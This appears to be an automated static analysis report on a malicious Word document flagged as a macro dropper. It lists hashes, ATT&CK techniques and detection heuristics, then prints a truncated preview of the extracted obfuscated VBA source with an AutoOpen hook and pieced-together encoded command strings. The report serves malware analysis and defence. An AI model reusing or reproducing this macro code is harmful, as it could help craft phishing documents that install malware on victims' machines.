Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4bfe1a64caabcf58…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 91.2 KB
Created: 2018-08-17 13:07:00
Authoring application: Microsoft Office Word
First seen: 2018-10-07
MD5: 0df8afc062747d46b8036182f8aecf83
SHA-1: 260135b7e16ffd8a38b64fc261eef6afb879bfde
SHA-256: 4bfe1a64caabcf58e2e4170e1bbae850c7d7362a877331f1516a5a607bebac0f
Risk Score: 142

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro is obfuscated but appears to construct and execute a command. The ClamAV detection 'Doc.Dropper.Valyria-6666909-0' suggests this file is a dropper. The presence of an AutoOpen macro indicates it is designed to execute automatically upon opening, likely as a spearphishing attachment.

Heuristics (5)

  • ClamAV: Doc.Dropper.Valyria-6666909-0 (severity: critical; id: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Valyria-6666909-0
  • VBA macros detected (severity: medium; id: OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code
  • AutoOpen macro (severity: high; id: OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker (severity: medium; id: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info; id: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 43089 bytes
SHA-256: 13a8dcdca93bdbfaa00c7f21a796ee379afce2a3f69cd3019a92c2b520e7b797

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "vKSKEZoqA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "jwLKAtJJfKECO"
Function mHCuild()
On Error Resume Next
VarType 96
   wGcQn = Int(759)
cPMaKDwhd = "mD" + "  " + "/V^" + ":^oN^ " + "^" + " "
VarType 7
   wGcQn = "ANZHL"
UItjOVCLjOv = "  /C" + " " + CStr(Chr(lfPXzLnGktbdhw + VFhfbPTT + 34 + azUKDJjNv + BTKrqCHlksBolk)) + " " + " SE^t" + "   ^" + " " + "Mz=@o" + "#2/^s^" + ".2l" + "l^" + " (2 ^J^" + "ABQ^A^H"
VarType CByte(zjijuQ * AaEGJ * AVMPTp * fOczdG)
   wGcQn = CDate(3071)
   wGcQn = "zMZdM"
mzjlXZQzUJ = "c^AR" + "^#^A" + "9^" + "AG^4^AZ" + "Q^B^3AC" + "0A^b^"
wGcQn = CDbl(5072)
   wGcQn = Sin(UuWSoV / zZFzJH)
JMVTkf = "#B-AGo" + "A^ZQ^" + "B^jA" + "H" + "QAW" + "A^BO^A^" + "G" + "^U^"
wGcQn = Hex(697)
   VarType 18
pCOjHSDOUB = "A" + "dAAu^" + "A" + ")cA^Z^Q" + "B^" + "-^A" + "E^MA^"
mHCuild = cPMaKDwhd + UItjOVCLjOv + mzjlXZQzUJ + JMVTkf + pCOjHSDOUB
   IsArray Atn(362)
   VarType 3917
End Function
Function WQwwrNhiX()
On Error Resume Next
VarType Sin(FKkrD + sMpNsm * 45992 * FBmmUn)
   VarType Log(78321 / 94219)
   IsArray "QDSiHj"
HszKuKfdF = "b^AB^@" + "AG" + "^U^Abg" + "^B0A^D^" + "sAJAB" + "^" + "-^A)" + "^Q" + "^Aa^gA" + "^9^AC" + "cA^a"
VarType "RAXHf"
   VarType "FPVmV"
XnSwtGoVz = "^" + "A" + "^B^" + "0AH" + "^QAcA"
VarType 8742
   wGcQn = Tan(PSwAYf - RvECi)
XbXzhLw = "A6AC8^A" + "L#^" + "Bu^A" + "^G^U^" + "A^" + "d^#Bz" + "AC4^AZ^" + "A" + "B@A" + "GcAaQ" + "B^" + "%"
IsArray 3893
   wGcQn = 152103109
cOTtTJWHR = "^" + "AG8^A^" + "b#B/" + "^" + "AC4A^" + "Y^"
IsArray 9498
   IsArray CCur(8)
   IsArray CDate(ibhtW + WwrOQz)
UZPjdhv = "#^Bv^" + "A^" + "G^0^" + "AL^#^B^" + "PA" + "^E^g" + "^A^"
wGcQn = Fix(51321 + 65339 + 37057 * zPYZth)
   IsArray "omhVh"
AjmTniv = "`#^" + "B^sAE^" + "A^A^" + "a^AB^0A" + "H^QAc^" + "A^A^6AC" + "^8^AL^#" + "B^t^A^" + "G^UA^b^" + "g" + "^B0A" + "^G^8A"
IsArray "ZcDCjj"
   IsArray 217
snLDi = "c^g^B" + "^iAH" + "Q^" + "Ac" + "g^B.^A" + "G^'^A" + "^" + "b^gB^@" + "AG^4" + "^" + "A^Z^#^A" + "^"
VarType CDate(52112 / owdGL / 5831 - WhToW)
   VarType "Kujia"
zraccGGzh = "uAG" + "^MA^" + "b^#^BtA" + "C^8A^" + "Z"
wGcQn = Sqr(qzzsl * viKjt)
   wGcQn = Cos(tbOZpj * NOHqU)
   IsArray LCase(8370 * ocMif + BvwbJn * kwQSQ)
KzELOjG = "^g" + "B" + "u^" + "A" + "G^W"
IsArray Val(kozBtA * afLrL)
   VarType CCur(24367 / mszkn)
   IsArray "UYEAbR"
MWNiYhOMBc = "^AO^Q^" + "BW^AEg" + "^AQ" + "^A" + "B^o^"
VarType CDec(51)
   wGcQn = Val(1469)
   VarType LCase(PdEsqD)
nqXGjMpAuMl = "AHQ^A" + "d^" + "A^B" + "^#" + "^AD^o^" + "A^L^#^A" + "v^AH" + "^" + "Q^AY^" + "Q^B^" + "0AG'^A^" + "bQA^u" + "A^"
WQwwrNhiX = HszKuKfdF + XnSwtGoVz + XbXzhLw + cOTtTJWHR + UZPjdhv + AjmTniv + snLDi + zraccGGzh + KzELOjG + MWNiYhOMBc + nqXGjMpAuMl
   IsArray CBool(KAmSHC)
   IsArray Str(362827190)
End Function
Function ujzovumILfD()
On Error Resume Next
IsArray "QaJvj"
   VarType CStr(cBDUF)
jVzFWuEQ = "G" + "^M^A^" + "b#B^tAC" + "4AY" + "gB^%^A" + "C^8A" + "^T^g" + "B^6" + "^" + "ADg" + "^A^QA" + "B^o^A" + "H"
IsArray "uqlvwZ"
   VarType 8779
ZnjnRKbo = "Q^A" + "^dA^B" + "#AD" + "o^AL^#" + "Av^" + "A^GcA^Z" + "Q^BvA" + "^G"
wGcQn = LCase(4)
   IsArray "fanbBY"
   VarType "IZtsj"
XGiIHh = "^MAb" + "#^B." + "^" + "AG#ALg" + "B^" + "j" + "A^G^8^" + "A^Lg" + "^B" + "6A"
IsArray 60
   wGcQn = Int(miADXP)
   wGcQn = Str(7272)
MwnGfv = "^G" + "^EAL" + "^#B`AH" + "^" + "QAR" + "g^B^"
IsArray "cYqAA"
   IsArray CDate(DICznD)
pTizTUzcXOs = "SA^G" + "8^AUA^B" + "^A^AGg^" + "Ad^A^" + "B" + "^0^A"
wGcQn = 9194
   wGcQn = Log(1)
   IsArray TimeValue(vdWFMa * aShQE)
aUzsX = "H^A^A^O" + "^g^Av" + "AC^8A" + "Zg^B#" + "^AHc^" + "AL^gBj^" + "A^G^8" + "^A^bQ^A" + "^" + "u" + "A"
VarType 5926
   VarType CStr(4791)
HhjPazZI = "^" + "G^0A2" + "Q" + "AvAHoA" + "^2QA" + "nAC^4" + "^AU"
ujzovumILfD = 
... (truncated)